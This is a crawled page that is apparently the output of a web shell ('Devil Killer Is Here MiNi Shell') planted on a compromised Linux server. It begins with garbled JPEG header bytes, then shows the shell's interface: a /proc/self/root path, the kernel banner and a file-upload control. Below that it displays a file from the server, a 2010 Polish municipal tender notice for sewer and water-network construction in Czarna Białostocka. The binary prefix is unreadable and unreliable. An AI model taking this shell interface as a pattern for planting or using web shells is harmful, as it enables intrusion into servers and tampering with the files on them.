JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20100813/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20100813/250664-N-2010.html

<p class="kh_header"><b>Czarna Białostocka: Budowa systemu kanalizacji sanitarnej i sieci wodociągowej dla aglomeracji Czarna Białostocka</b><br>
<b>Numer ogłoszenia: 250664 - 2010; data zamieszczenia: 13.08.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Czarna Białostocka reprezentowana przez Burmistrza Czarnej Białostockiej , ul. Traugutta 2, 16-020 Czarna Białostocka, woj. podlaskie, tel. 085 7131367, faks 085 7131349.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.czarnabialostocka.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Budowa systemu kanalizacji sanitarnej i sieci wodociągowej dla aglomeracji Czarna Białostocka.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest budowa systemu kanalizacji sanitarnej i sieci wodociągowej dla aglomeracji Czarna Białostocka:
1.	Zadanie II: Budowa kanalizacji sanitarnej na osiedlu Pierekały w Czarnej Białostockiej (III etap) obejmująca w szczególności:
a)	wykonanie i uzgodnienie projektu organizacji ruchu na czas prowadzenia robót w pasie drogowym drogi gminnej z Gminą Czarna Białostocka wraz z uwzględnieniem  kosztów zajęcia pasa drogowego na czas prowadzonych robót;
b)	wykonanie geodezyjnego tyczenia trasy sieci i przyłączy kanalizacyjnych (uwaga: kanały tłoczne wykonane w 2009 r do skrzyżowania ul. Świerkowej z ul. Dębową - rejon studni S 3/24);
c)	wykonanie wykopów pod kanały sanitarne grawitacyjne i tłoczne, przyłącza i studnie kanalizacyjne;
d)	wykonanie kanału sanitarnego z rur PVC, litych, klasy S o śr. 200 mm - ok. 545,0 mb;
e)	montaż studni kanalizacyjnych PE 1000 z włazem żeliwnym D600, 40T, pierścieniem dystansowym i odciążającym - szt. 14;
f)	montaż studni kanalizacyjnych betonowych o śr. 1000 mm - szt. 3;
g)	montaż studni kanalizacyjnych PVC-U 425 z włazem żeliwnym - szt. 20;
h)	wykonanie przyłączy kanalizacji sanitarnej z rur PCV, litych, klasy S o śr. 160 mm - ok. 139,0 mb;
i)	dostawa i montaż najazdowej przepompowni ścieków P2 z włazem kl. D-400 zatrzaskowe z zabezpieczeniem antykradzieżowym np. typu OTC wraz z systemem monitoringu zdalnego, okablowaniem elektrycznym, podłączeniem do energetycznej listwy zasilającej, uruchomieniem - 1 kpl;
j)	dostawa i montaż pompowni ścieków P3 wraz z systemem monitoringu zdalnego, okablowaniem elektrycznym, podłączeniem do energetycznej listwy zasilającej, uruchomieniem oraz ogrodzeniem - 1 kpl;
k)	wykonanie kanału tłocznego PE 90 x 5,1 (SDR 17 PE 100, PN-10) - ok. 522,00 mb;
l)	wykonanie geodezyjnej inwentaryzacji powykonawczej;
m)	wykonanie inspekcji telewizyjnej zrealizowanej sieci kanalizacji sanitarnej;
n)	odtworzenie nawierzchni dróg gruntowych z uwzględnieniem rozścielenia nowej wierzchniej warstwy żwirowej z zagęszczenie (gr. 10 cm po zagęszczeniu) na całej szerokości drogi w której realizowana jest inwestycja kanalizacyjna.
2.	Zadanie III: Budowa wodociągu na osiedlu Miasteczko w Czarnej Białostockiej obejmująca w szczególności:
a)	wykonanie i uzgodnienie projektu organizacji ruchu na czas prowadzenia robót w pasie drogowym drogi gminnej z Gminą Czarna Białostocka wraz z uwzględnieniem  kosztów zajęcia pasa drogowego na czas prowadzonych robót (od węzła W16 wykonanego w roku 2010);
b)	wykonanie geodezyjnego tyczenia trasy sieci i przyłączy wodociągowych (uwaga: węzeł W16 wykonany w roku 2010 r.);
c)	wykopy pod kanały magistrali wodociągowej wewnątrz osiedlowej i przyłącza;
d)	wykonanie sieci wodociągowej z przyłączami wodociągowymi od węzła W16 do węzła W16/10 z rur PE PN10 SDR 17 lub równoważnych wraz z niezbędnym osprzętem odcinającym oraz hydrantami w zakresie średnic:
o śr. 160 mm - ok. 186 mb,
o śr. 110 mm - ok. 318 mb,
o śr. 90 mm - ok. 8 mb,
o śr. 32 mm - ok. 18 mb;
e)	wykonanie 2 szt. włączeń istniejącej sieci zasilającej budynki mieszkalne do realizowanej sieci wodociągowej;
f)	wykonanie geodezyjnej inwentaryzacji powykonawczej;
g)	odtworzenie nawierzchni dróg i chodników.
3.	Zadanie IV: Budowa kanalizacji sanitarnej na ul. Wrzosowej i Fabrycznej oraz osiedlu Miasteczko w Czarnej Białostockiej obejmująca w szczególności:
a)	wykonanie i uzgodnienie projektu organizacji ruchu na czas prowadzenia robót w pasie drogowym drogi gminnej z Gminą Czarna Białostocka oraz w pasie drogowym drogi powiatowej z Powiatowym Zarządem Dróg w Białymstoku wraz z uwzględnieniem  kosztów zajęcia pasa drogowego na czas prowadzonych robót;
b)	uzyskanie zgody na wejście na teren związany z przebudową przepompowni P6 (dz. Nr ewid. 1594 obręb Czarna Białostocka) od PKP S.A. Odział Gospodarowania Nieruchomościami  w Warszawie wraz z uwzględnieniem kosztów zajęcia terenu na czas robót oraz trwałe zajęcie gruntu w czasie obowiązywania umowy na wykonanie zadania;
c)	uzyskanie zgody po przedłożeniu organizacji robót prowadzonych na terenie PKP na  przebudowę przepompowni P6 od Zakładu Linii Kolejowych w Białymstoku;
d)	wykonanie geodezyjnego tyczenia trasy sieci i przyłączy kanalizacyjnych oraz posadowienia przepompowni P5B, P5C, P5, P6;
e)	wykopy pod kanał sanitarny, przyłącza, studnie kanalizacyjne, przepompownie;
f)	wykonanie przepięcia istniejących przyłączy kanalizacji sanitarnej do wybudowanej sieci na terenie os. Miasteczko do studni 15/3 oraz 21/3 lub do studni 9/3;
g)	wykonanie kanału sanitarnego tłocznego z rur PE PN10 SDR 17 następujących średnic:
PE 160 x 9,5 - ok. 1.880 mb,
PE 110 x 6,6 - ok. 1.056 mb,
PE 90 x 5,4 - ok. 6 mb;
h)	wykonanie przecisków z rur stalowych lub równoważnych:
RS 219 - 7 szt. o długościach: 6m - 5 szt., 3m - 1 szt., 16m - 1 szt.,
RS 273 - 5 szt. o długościach: 11m - 3 szt., 14m - 1 szt.,7m - 1 szt.;
i)	wykonanie kanału sanitarnego i przyłączy z rur PCV, litych, klasy S o śr.:
DN 315 - ok. 17 mb,
DN 250 - ok. 337 mb,
DN 200 - ok. 910 mb (w tym przyłącza 12 szt. o łącznej długości ok. 85 mb)
wraz z montażem studni kanalizacyjnych przelotowych, przyłączeniowych, przelotowo-przyłączeniowych, rozprężnych, z zaworem napowietrzająco-odpowietrzającym, z zasuwami nożowymi);
j)	dostawa, montaż i uruchomienie nowych przepompowni ścieków:
P5B Fabryczna,
P5C Miasteczko;
k)	przebudowa przepompowni ścieków z demontażem starych z dostawą, montażem i uruchomieniem nowych przepompowni:
P5 Wierzbowa,
P6 Brzozowy Mostek;
l)	wykonanie linii zasilania elektrycznego ww. przepompowni;
m)	dostawa i montaż rur dwudzielnych AROT typ A110PS lub równoważnych jako zabezpieczenie kabli telefonicznych;
n)	wykonanie geodezyjnej inwentaryzacji powykonawczej;
o)	odtworzenie nawierzchni;
p)	wykonanie inspekcji telewizyjnej kanalizacji sanitarnej - grawitacyjnej.
4.	Zadanie V: Budowa kanalizacji sanitarnej na osiedlu Buksztel w Czarnej Białostockiej obejmująca w szczególności:
a)	wykonanie i uzgodnienie projektu organizacji ruchu na czas prowadzenia robót w pasie drogowym dróg gminnych z Gminą Czarna Białostocka, w pasie drogowym drogi powiatowej  z Powiatowym Zarządem Dróg w Białymstoku oraz w pasie drogowym drogi krajowej z Generalną Dyrekcją Dróg Krajowych i Autostrad wraz z uwzględnieniem  kosztów zajęcia pasa drogowego na czas prowadzonych robót;
b)	 wykonanie geodezyjnego tyczenia trasy sieci, przyłączy kanalizacyjnych i tłoczni;
c)	 wykopy pod kanał sanitarny, przyłącza, studnie kanalizacyjne, tłocznię;
d)	 wykonanie odwodnień wykopów igłofiltrami oraz rurarzem drenarskim;
e)	budowa studni rewizyjnych bet. fi 1000 - 41 szt.;
f)	budowa studni kanalizacyjnych systemowych PVC, fi 600 - 1 szt.;
g)	budowa studzienek przyłączeniowych, systemowych PVC, fi 400 - 24 szt.;
h)	budowa kanału sanitarnego z rur PVC łączonych na wcisk, klasy S fi 200 - ok. 1.207,00 mb;
i)	budowa kanału sanitarnego z rur PVC łączonych na wcisk, klasy S, fi 160, przyłącza - ok. 257,00 mb;
j)	przeciski pod drogą krajową w osłonie z rury stalowej 219,1 x 8,0 - 6 przecisków o łącznej długości ok. 72,00 mb;
k)	przecisk w rurze osłonowej stalowej 273,0 x 8,8 - 7 przecisków o łącznej długości - ok. 69,00 mb;
l)	dostawa, montaż, uruchomienie tłoczni ścieków P1 z podłączeniem energetycznym oraz ogrodzeniem;
m)	budowa kanału ciśnieniowego rur PE100 SDR 17 110x6,6 - ok. 290,00 mb;
n)	przebudowa hydrantu DN 80 - 1 kpl;
o)	 roboty odtworzeniowe nawierzchni z mas mineralno-bitumicznych, polbruku, płyt drogowych sześciokątnych o boku 15 cm, płytek chodnikowych 35 x 35 x 5 itp. oraz nawierzchni dróg gruntowych z jednoczesnym rozesłaniem żwiru drogowego gr. 10 cm (po zagęszczeniu) na całej szerokości drogi na której realizowana jest inwestycja;
p)	wykonanie geodezyjnej inwentaryzacji powykonawczej;
q)	wykonanie inspekcji telewizyjnej kanalizacji sanitarnej - grawitacyjnej.
5.	Zadanie VI: Budowa kanalizacji sanitarnej na osiedlu Tartaczne w Czarnej Białostockiej obejmująca w szczególności:
a)	wykonanie i uzgodnienie projektu organizacji ruchu na czas prowadzenia robót w pasie drogowym dróg gminnych z Gminą Czarna Białostocka, wraz z uwzględnieniem  kosztów zajęcia pasa drogowego na czas prowadzonych robót;
b)	wykonanie geodezyjnego tyczenia trasy sieci, przyłączy kanalizacyjnych i tłoczni;
c)	wykopy pod kanał sanitarny, przyłącza, studnie kanalizacyjne, tłocznię;
d)	budowa studni rewizyjnych bet. fi 1000 - 59 szt.;
e)	budowa studzienek przyłączeniowych, systemowych PVC, fi 400 - 58 szt.;
f)	budowa kanału sanitarnego z rur PVC łączonych na wcisk, klasy S fi 200 - ok. 1.440,00 mb;
g)	budowa kanału sanitarnego z rur PVC łączonych na wcisk, klasy S, fi 160, przyłącza - ok. 344,00 mb;
h)	dostawa, montaż, uruchomienie tłoczni ścieków P2 z podłączeniem energetycznym oraz ogrodzeniem;
i)	budowa kanału ciśnieniowego z rur PE100 SDR 17 110x6,6 - ok. 372,00 mb;
j)	przebudowa przyłączy wodociągowych szt.3 , DN 32, o łącznej długości 15 mb;
k)	roboty odtworzeniowe nawierzchni z mas mineralno-bitumicznych, polbruku, płyt drogowych sześciokątnych o boku 15 cm, płytek chodnikowych 35 x 35 x 5 itp. oraz nawierzchni dróg gruntowych z jednoczesnym rozesłaniem żwiru drogowego gr. 10 cm (po zagęszczeniu) na całej szerokości dróg na których realizowana jest inwestycja;
l)	wykonanie geodezyjnej inwentaryzacji powykonawczej;
m)	wykonanie inspekcji telewizyjnej kanalizacji sanitarnej - grawitacyjnej.
6.	Zadanie I nie zostało objęte zamówieniem gdyż zostało zrealizowane w roku 2009.
7.	Wykonawca załączy do oferty harmonogram rzeczowo-finansowy robót wynikających z kosztorysu ofertowego w rozbiciu na elementy przewidziane do wykonania w danym kwartale realizacji inwestycji z podaniem kosztów ich wykonania - dla każdego zadania odrębnie.
8.	Szczegółowy zakres prac wszystkich zadań objętych zamówieniem zawierają przedmiary robót, dokumentacja projektowa oraz specyfikacje techniczne wykonania i odbioru robót, stanowiące załączniki do niniejszej specyfikacji.
9.	Projekty budowlane oraz specyfikacje techniczne wykonania i odbioru robót w wersji papierowej dostępne są w siedzibie Zamawiającego.
10.	Materiały użyte do montażu powinny posiadać odpowiednie dopuszczenia do stosowania w budownictwie oraz odpowiadać wymaganiom określonym w projekcie budowlanym i w STWiOR.
11.	Inwestycja objęta zamówieniem współfinansowana jest ze środków Unii Europejskiej w ramach Regionalnego Programu Operacyjnego Województwa Podlaskiego na lata 2007-2013.
12.	Wymagania organizacyjne:
a)	w terminie 1 tygodnia Wykonawca zawiadomi Zamawiającego o zakończeniu etapu robót wynikającego z harmonogramu, w celu przystąpienia do odbioru częściowego zgłoszonego etapu robót;
b)	na podstawie bezusterkowego protokołu odbioru częściowego Wykonawca będzie mógł wystawić fakturę z 30 dniowym terminem płatności;
c)	faktura częściowa może być wystawiona na koniec każdego kwartału, w przypadku nie skorzystania z tego prawa, następna faktura częściowa może zostać wystawiona na koniec następnego kwartału;
d)	końcowe rozliczenie nastąpi na podstawie faktury (rachunku) z 30-dniowym terminem płatności, który wykonawca wystawi po podpisaniu protokołu odbioru końcowego  bez uwag;
e)	ustalenia i decyzje dotyczące wykonywania zamówienia uzgadniane będą przez Zamawiającego z ustanowionym przedstawicielem Wykonawcy;
f)	określenie przez Wykonawcę telefonów kontaktowych i numerów fax. oraz innych ustaleń niezbędnych dla sprawnego i terminowego wykonania zamówienia
13.	Wymagania dot. gwarancji:
Wykonawca udzieli Zamawiającemu gwarancji jakości wykonania przedmiotu umowy na okres 36 miesięcy od daty podpisania przez zamawiającego i wykonawcę protokołu końcowego.
14.	Wykonawca w trakcie realizacji zamówienia może składać wnioski i propozycje zmiany sposobu wykonania zamówienia, które przyspieszą ukończenie robót.
15.	Zamawiający dopuszcza wprowadzenie zmian technicznych i technologicznych w urządzeniach, materiałach, w szczególności gdy wystąpi co najmniej jedna z poniższych okoliczności:
a)	konieczność zrealizowania umowy przy zastosowaniu innych rozwiązań technicznych lub materiałowych ze względu na zmiany obowiązującego prawa,
b)	zmiany w wymaganiach parametrycznych urządzeń w związku z pojawiającymi się rozwojowymi zmianami techniczno-technologicznymi.
16.	Zamawiający dopuszczając wprowadzenie zmian sposobu wykonania zamówienia, zmian technicznych i technologicznych w urządzeniach, materiałach nie dopuszcza możliwości zmian w dokumentacji projektowej skutkujących koniecznością uzyskania pozwolenia na budowę oraz wysokości wynagrodzenia.
17.	Wymagania stawiane Wykonawcy:
a)	Wykonawca jest odpowiedzialny za jakość, zgodność z warunkami technicznymi i jakościowymi opisanymi dla przedmiotu zamówienia,
b)	wymagana jest należyta staranność przy realizacji zobowiązań umowy;
c)	ustalenia i decyzje dotyczące wykonywania zamówienia uzgadniane będą przez Zamawiającego z ustanowionym przedstawicielem Wykonawcy;
d)	określenie przez Wykonawcę telefonów kontaktowych i numerów fax. oraz innych ustaleń niezbędnych dla sprawnego i terminowego wykonania zamówienia;
e)	Zamawiający nie ponosi odpowiedzialności za szkody wyrządzone przez Wykonawcę podczas wykonywania przedmiotu zamówienia;
f)	Wykonawca jest odpowiedzialny za zgodność wykonywanych robót z warunkami technicznymi i jakościowymi właściwymi dla przedmiotu zamówienia.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający dopuszcza możliwość udzielenia zamówień uzupełniających stanowiących nie więcej niż 50% wartości zamówienia podstawowego</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.23.13.00-8.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 5.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.06.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający wymaga wniesienia wadium przed upływem terminu składania ofert w wysokości w wysokości:
a)	zadanie II: 25.000,00 zł (słownie: dwadzieścia pięć tysięcy złotych);
b)	zadanie III: 7.000,00 zł (słownie: siedem tysięcy złotych);
c)	zadanie IV: 100.000,00 zł (słownie: sto tysięcy złotych);
d)	zadanie V: 35.000,00 zł (słownie: trzydzieści pięć tysięcy złotych);
e)	zadanie VI: 36.000,00 zł (słownie: trzydzieści sześć tysięcy złotych)</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>wymagane jest wykazanie przez Wykonawcę realizacji co najmniej 3 robót budowlanych polegających na wykonaniu sieci wodociągowej lub kanalizacyjnej o wartości zamówienia min. 1.000.000,00 zł brutto w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>wymagane jest wykazanie przez Wykonawcę dysponowaniem kierownikiem budowy posiadającym uprawnienia do kierowania robotami branży sanitarnej</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>wymagane jest wykazanie przez Wykonawcę opłaconej polisy, a w przypadku jej braku innego dokumentu potwierdzającego, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia o sumie ubezpieczenia odpowiedzialności cywilnej w wysokości  min. 1.000.000,00 zł</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

